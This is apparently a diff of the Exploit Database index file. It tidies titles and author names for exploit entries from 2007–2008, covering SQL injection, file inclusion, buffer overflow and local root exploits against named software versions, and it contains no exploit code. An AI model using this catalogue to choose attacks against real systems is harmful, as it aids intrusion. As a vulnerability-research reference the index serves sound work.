+4773,platforms/multiple/dos/4773.pl,"OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit",2007-12-23,"Noam Rathaus",multiple,dos,0 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 (go.php) Remote SQL Injection Exploit",2007-12-23,DNX,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script <= 1.6.5 Multiple Remote SQL Injection Vulnerabilities",2007-12-23,MhZ91,php,webapps,0 4776,platforms/php/webapps/4776.txt,"MMSLamp (idpro) Remote SQL Injection Vulnerability",2007-12-23,x0kster,php,webapps,0 @@ -4437,7 +4437,7 @@ id,file,description,date,author,platform,type,port 4793,platforms/php/webapps/4793.txt,"Blakord Portal <= Beta 1.3.A (all modules) SQL Injection Vulnerability",2007-12-26,JosS,php,webapps,0 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds <= 4.95.11 LFI / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds <= 4.95.11 Remote File Inclusion Vuln",2007-12-26,Kw3[R]Ln,php,webapps,0 -4796,platforms/php/webapps/4796.txt,"PNphpBB2 <= 1.2i (printview.php phpEx) Local File Inclusion Vuln",2007-12-26,irk4z,php,webapps,0 +4796,platforms/php/webapps/4796.txt,"PNphpBB2 <= 1.2i - (printview.php phpEx) Local File Inclusion Vuln",2007-12-26,irk4z,php,webapps,0 4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 Logfile Information Disclosure Exploit",2007-12-27,"Alex Hernandez",hardware,remote,0 4798,platforms/php/webapps/4798.php,"ZeusCMS <= 0.3 Remote Blind SQL Injection Exploit",2007-12-27,EgiX,php,webapps,0 4799,platforms/php/webapps/4799.txt,"Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability",2007-12-27,EcHoLL,php,webapps,0 @@ -4450,7 +4450,7 @@ id,file,description,date,author,platform,type,port 4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch (forum.php) Remote Code Execution Exploit",2007-12-29,irk4z,php,webapps,0 4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host <= 3.0.x Remote File Inclusion Vulnerability",2007-12-29,GoLd_M,php,webapps,0 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo Remote SQL Injection Exploit",2007-12-29,Pr0metheuS,php,webapps,0 -4810,platforms/php/webapps/4810.txt,"CMS Made Simple <= 1.2.2 (TinyMCE module) SQL Injection Vuln",2007-12-30,EgiX,php,webapps,0 +4810,platforms/php/webapps/4810.txt,"CMS Made Simple <= 1.2.2 (TinyMCE module) SQL Injection Vuln",2007-12-30,EgiX,php,webapps,0 4811,platforms/php/webapps/4811.txt,"Kontakt Formular 1.4 Remote File Inclusion Vulnerability",2007-12-30,bd0rk,php,webapps,0 4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 download.php Remote File Disclosure Vuln",2007-12-30,GoLd_M,php,webapps,0 4813,platforms/php/webapps/4813.txt,"XCMS <= 1.83 Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 @@ -4506,7 +4506,7 @@ id,file,description,date,author,platform,type,port 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0 4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"EvilBoard 0.1a (SQL/XSS) Multiple Remote Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 -4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,"Matteo Memelli",windows,remote,0 +4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0 4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 @@ -4532,7 +4532,7 @@ id,file,description,date,author,platform,type,port 4890,platforms/php/webapps/4890.txt,"AJchat 0.10 unset() bug Remote SQL Injection Vulnerability",2008-01-11,"Eugene Minaev",php,webapps,0 4891,platforms/php/webapps/4891.php,"Docebo <= 3.5.0.3 (lib.regset.php/non-blind) SQL Injection Exploit",2008-01-11,rgod,php,webapps,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit",2008-01-11,shinnai,windows,local,0 -4893,platforms/linux/dos/4893.c,"Linux Kernel <=2.6.21.1 IPv6 Jumbo Bug Remote DoS Exploit",2008-01-11,"Clemens Kurtenbach",linux,dos,0 +4893,platforms/linux/dos/4893.c,"Linux Kernel <= 2.6.21.1 - IPv6 Jumbo Bug Remote DoS Exploit",2008-01-11,"Clemens Kurtenbach",linux,dos,0 4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager ccpm_0237.dll BoF Exploit",2008-01-11,Elazar,windows,remote,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 (id) Remote SQL Injection Vulnerability",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 @@ -4542,7 +4542,7 @@ id,file,description,date,author,platform,type,port 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities",2008-01-12,trew,asp,webapps,0 4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 (userName) Remote SQL Injection Vulnerability",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 Remote File Disclosure Vulnerability",2008-01-13,Houssamix,php,webapps,0 -4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) BoF Exploit",2008-01-13,rgod,windows,remote,0 +4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - BoF Exploit",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability",2008-01-13,JosS,php,webapps,0 4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit",2008-01-13,Pr0metheuS,php,webapps,0 4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC",2008-01-14,"Luigi Auriemma",windows,remote,0 @@ -4553,10 +4553,10 @@ id,file,description,date,author,platform,type,port 4911,platforms/windows/dos/4911.c,"Cisco VPN Client IPSec Driver Local kernel system pool Corruption PoC",2008-01-15,mu-b,windows,dos,0 4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability",2008-01-15,ka0x,php,webapps,0 4913,platforms/windows/remote/4913.html,"Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 -4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 v1 (show.php) Remote SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 -4915,platforms/php/webapps/4915.txt,"FaScript FaName v1 (page.php) Remote SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 +4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) Remote SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 +4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) Remote SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition (show.php) SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 -4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack v1 (show.php) SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 +4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance (CamPanel.dll 2.1.0.2) BOF Exploit",2008-01-16,rgod,windows,remote,0 4919,platforms/php/webapps/4919.txt,"Blogcms 4.2.1b (SQL/XSS) Multiple Remote Vulnerabilities",2008-01-16,DSecRG,php,webapps,0 4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 (effect.php page) Local File Inclusion Vulnerability",2008-01-16,DSecRG,php,webapps,0 @@ -4565,7 +4565,7 @@ id,file,description,date,author,platform,type,port 4923,platforms/windows/remote/4923.txt,"MiniWeb 0.8.19 Multiple Remote Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 Remote Blind SQL Injection Exploit",2008-01-16,Silentz,php,webapps,0 4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability",2008-01-16,IRCRASH,php,webapps,0 -4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 +4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit",2008-01-16,Silentz,php,webapps,0 4928,platforms/php/webapps/4928.txt,"MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability",2008-01-17,Stack,php,webapps,0 @@ -4581,7 +4581,7 @@ id,file,description,date,author,platform,type,port 4939,platforms/php/webapps/4939.txt,"Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 Auth Bypass Vulnerability",2008-01-20,DarkFig,hardware,remote,0 -4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability",2008-01-20,Sha0,php,webapps,0 +4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability",2008-01-20,Sha0,php,webapps,0 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 explorerdir.php Local Directory Traversal Vulnerability",2008-01-20,Houssamix,php,webapps,0 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"Bloofox 0.3 (SQL/FD) Multiple Remote Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 @@ -4634,7 +4634,7 @@ id,file,description,date,author,platform,type,port 4993,platforms/php/webapps/4993.txt,"Wordpress plugin fGallery 2.4.1 fimrss.php SQL Injection Vulnerability",2008-01-27,Houssamix,php,webapps,0 4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 pitrig_drop PLSQL Injection (get users hash)",2008-01-28,Sh2kerr,multiple,local,0 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)",2008-01-28,Sh2kerr,multiple,local,0 -4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,Sh2kerr,multiple,local,0 +4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg PLSQL Injection (change sys password)",2008-01-28,Sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)",2008-01-28,Sh2kerr,multiple,dos,0 4998,platforms/windows/local/4998.c,"IrfanView 4.10 .FPX File Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 @@ -4647,7 +4647,7 @@ id,file,description,date,author,platform,type,port 5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 (parser.php file) Remote File Disclosure Vulnerability",2008-01-29,DSecRG,php,webapps,0 5007,platforms/php/webapps/5007.txt,"Mambo Component Newsletter (listid) Remote SQL Injection Vulnerability",2008-01-29,"S@BUN ",php,webapps,0 5008,platforms/php/webapps/5008.txt,"Mambo Component Fq (listid) Remote SQL Injection Vulnerability",2008-01-29,"S@BUN ",php,webapps,0 -5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML (listid) Remote SQL Injection Vulnerability",2008-01-29,"S@BUN ",php,webapps,0 +5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML (listid) Remote SQL Injection Vulnerability",2008-01-29,"S@BUN ",php,webapps,0 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability",2008-01-30,"S@BUN ",php,webapps,0 5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes (aid) Remote SQL Injection Vulnerability",2008-01-30,"S@BUN ",php,webapps,0 5012,platforms/php/webapps/5012.pl,"Connectix Boards <= 0.8.2 template_path Remote File Inclusion Exploit",2008-01-30,Houssamix,php,webapps,0 @@ -4743,13 +4743,13 @@ id,file,description,date,author,platform,type,port 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client WFICA.OCX ActiveX Heap BOF Exploit",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office .WPS File Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 -5108,platforms/php/webapps/5108.txt,"Affiliate Market Ver.0.1 BETA (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0 +5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,"S@BUN ",php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffiĂ© ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0 5112,platforms/jsp/webapps/5112.txt,"JSPWiki 2.4.104 / 2.5.139 Multiple Remote Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 -5114,platforms/php/webapps/5114.pl,"Affiliate Market Ver.0.1 BETA XSS / SQL Injection Exploit",2008-02-14,IRCRASH,php,webapps,0 +5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - XSS / SQL Injection Exploit",2008-02-14,IRCRASH,php,webapps,0 5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 (threads.php ssid) SQL Injection Vulnerability",2008-02-14,IRCRASH,php,webapps,0 5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 Multiple Local File Inclusion Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0 5117,platforms/php/webapps/5117.txt,"Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability",2008-02-14,"S@BUN ",php,webapps,0 @@ -4826,7 +4826,7 @@ id,file,description,date,author,platform,type,port 5188,platforms/windows/remote/5188.html,"Rising Antivirus Online Scanner Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 5189,platforms/php/webapps/5189.pl,"DBHcms <= 1.1.4 Remote File Inclusion exploit",2008-02-25,Iron,php,webapps,0 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control BOF Exploit",2008-02-26,Elazar,windows,remote,0 -5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu <= 1228.3.13 ipv6-ipcomp Remote kernel DoS PoC",2008-02-26,mu-b,multiple,dos,0 +5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu <= 1228.3.13 - IPv6-ipcomp Remote kernel DoS PoC",2008-02-26,mu-b,multiple,dos,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) BOF Exploit",2008-02-26,rgod,windows,remote,0 5194,platforms/php/webapps/5194.txt,"Wordpress Plugin Sniplets 1.1.2 (RFI/XSS/RCE) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 @@ -4835,7 +4835,7 @@ id,file,description,date,author,platform,type,port 5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 (head_auth.php) Remote File Inclusion Vulnerability",2008-02-27,CraCkEr,php,webapps,0 5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 (categ) Remote SQL Injection Vulnerability",2008-02-28,Cr@zy_King,php,webapps,0 5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 Multiple Remote File Inclusion Vulnerabilities",2008-02-28,MhZ91,php,webapps,0 -5200,platforms/php/webapps/5200.txt,"Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Vulnerabilities",2008-02-28,GoLd_M,php,webapps,0 +5200,platforms/php/webapps/5200.txt,"Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Vulnerabilities",2008-02-28,GoLd_M,php,webapps,0 5201,platforms/windows/dos/5201.txt,"Crysis <= 1.1.1.5879 Remote Format String Denial of Service PoC",2008-02-28,"Long Poke",windows,dos,0 5202,platforms/php/webapps/5202.txt,"Barryvan Compo Manager 0.5pre-1 Remote File Inclusion Vulnerability",2008-02-28,MhZ91,php,webapps,0 5203,platforms/php/webapps/5203.txt,"PHP-Nuke My_eGallery <= 2.7.9 Remote SQL Injection Vulnerability",2008-02-28,"Aria-Security Team",php,webapps,0 @@ -4854,8 +4854,8 @@ id,file,description,date,author,platform,type,port 5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability",2008-03-06,"S@BUN ",php,webapps,0 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 ActiveX Remote Denial of Service Exploit",2008-03-06,spdr,windows,dos,0 5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability",2008-03-06,"S@BUN ",php,webapps,0 -5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 Remote Add Admin Exploit",2008-03-07,"Charles Fol",php,webapps,0 -5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 Remote Upload Exploit",2008-03-07,"Charles Fol",php,webapps,0 +5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin Exploit",2008-03-07,"Charles Fol",php,webapps,0 +5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Remote Upload Exploit",2008-03-07,"Charles Fol",php,webapps,0 5221,platforms/php/webapps/5221.txt,"Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability",2008-03-08,"S@BUN ",php,webapps,0 5222,platforms/php/webapps/5222.txt,"QuickTicket <= 1.5 (qti_usr.php id) SQL Injection Vulnerability",2008-03-09,croconile,php,webapps,0 5223,platforms/php/webapps/5223.txt,"BM Classifieds <= 20080409 Multiple SQL Injection Vulnerabilities",2008-03-09,xcorpitx,php,webapps,0 @@ -4870,7 +4870,7 @@ id,file,description,date,author,platform,type,port 5232,platforms/php/webapps/5232.txt,"Mapbender <= 2.4.4 (mapFiler.php) Remote Code Execution Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0 5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 (gaz) Remote SQL Injection Vulnerability",2008-03-11,"RedTeam Pentesting",php,webapps,0 5234,platforms/php/webapps/5234.txt,"Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities",2008-03-11,MhZ91,php,webapps,0 -5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,"Matteo Memelli",windows,dos,0 +5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0 5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) Remote SQL Injection Vulnerability",2008-03-11,t0pP8uZz,php,webapps,0 5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability",2008-03-11,"S@BUN ",php,webapps,0 5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit",2008-03-11,"Core Security",windows,remote,0 @@ -4879,21 +4879,21 @@ id,file,description,date,author,platform,type,port 5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability",2008-03-12,"S@BUN ",php,webapps,0 5242,platforms/php/webapps/5242.txt,"XOOPS Module My_eGallery 3.04 (gid) SQL Injection Vulnerability",2008-03-12,"S@BUN ",php,webapps,0 5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB (kb.php) Remote SQL Injection Vulnerability",2008-03-12,TurkishWarriorr,php,webapps,0 -5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 Remote SQL Injection Vulnerability",2008-03-12,"S@BUN ",php,webapps,0 +5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - Remote SQL Injection Vulnerability",2008-03-12,"S@BUN ",php,webapps,0 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability",2008-03-12,"S@BUN ",php,webapps,0 5246,platforms/php/webapps/5246.txt,"EasyCalendar <= 4.0tr Multiple Remote Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"EasyGallery <= 5.0tr Multiple Remote Vulnerabilities",2008-03-12,JosS,php,webapps,0 -5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit",2008-03-13,"Matteo Memelli",windows,remote,143 +5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 (FETCH) Remote Buffer Overflow Exploit",2008-03-13,ryujin,windows,remote,143 5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit",2008-03-14,haluznik,windows,remote,0 5250,platforms/windows/local/5250.cpp,"VLC <= 0.8.6e Subtitle Parsing Local Buffer Overflow Exploit",2008-03-14,"Mai Xuan Cuong",windows,local,0 -5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces (lid) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 -5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 (blog_id) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 -5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso <= 2.0.4.3 (kid) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 -5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 (roomid) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 +5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 +5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 +5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso <= 2.0.4.3 - (kid) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 +5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) Remote SQL Injection Vulnerability",2008-03-14,"S@BUN ",php,webapps,0 5256,platforms/php/webapps/5256.pl,"AuraCMS <= 2.2.1 (online.php) Remote Blind SQL Injection Exploit",2008-03-14,NTOS-Team,php,webapps,0 -5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit",2008-03-14,Kingcope,multiple,remote,0 +5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,Kingcope,multiple,remote,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster rpc.metad Denial of Service PoC",2008-03-14,Kingcope,solaris,dos,0 -5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit",2008-03-14,"Matteo Memelli",windows,remote,143 +5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 5260,platforms/php/webapps/5260.txt,"fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"Mutiple Timesheets <= 5.0 Multiple Remote Vulnerabilities",2008-03-16,JosS,php,webapps,0 @@ -4961,11 +4961,11 @@ id,file,description,date,author,platform,type,port 5327,platforms/windows/dos/5327.txt,"MS Windows Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability",2008-03-31,n/a,php,webapps,0 -5330,platforms/windows/remote/5330.c,"mod_jk2 v2.0.2 for Apache 2.0 Remote Buffer Overflow Exploit (win32)",2008-03-31,Heretic2,windows,remote,80 +5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)",2008-03-31,Heretic2,windows,remote,80 5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 (articleId) Remote SQL Injection Vulnerability",2008-03-31,IRCRASH,php,webapps,0 5332,platforms/windows/remote/5332.html,"Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr (SQL/XSS/LFI) Remote SQL Injection Exploit",2008-04-01,IRCRASH,php,webapps,0 -5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto v1 (show.php id) SQL Injection Vulnerability",2008-04-01,IRCRASH,php,webapps,0 +5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection Vulnerability",2008-04-01,IRCRASH,php,webapps,0 5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability",2008-04-01,"S@BUN ",php,webapps,0 5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 Password Retrieve Remote SQL Injection Exploit",2008-04-01,girex,php,webapps,0 5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 (id) SQL Injection Vulnerability",2008-04-01,Stack,php,webapps,0 @@ -4985,7 +4985,7 @@ id,file,description,date,author,platform,type,port 5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives (id) Remote SQL Injection Vulnerability",2008-04-03,"S@BUN ",php,webapps,0 5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) Remote SQL Injection Vulnerability",2008-04-03,Houssamix,php,webapps,0 5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability",2008-04-03,Stack,php,webapps,0 -5354,platforms/windows/dos/5354.c,"Xitami Web Server v2.5c2 LRWP Processing Format String PoC",2008-04-03,bratax,windows,dos,0 +5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String PoC",2008-04-03,bratax,windows,dos,0 5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit",2008-04-04,qaaz,sco,local,0 5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA Local Root Exploit",2008-04-04,qaaz,sco,local,0 5357,platforms/sco/local/5357.c,"SCO 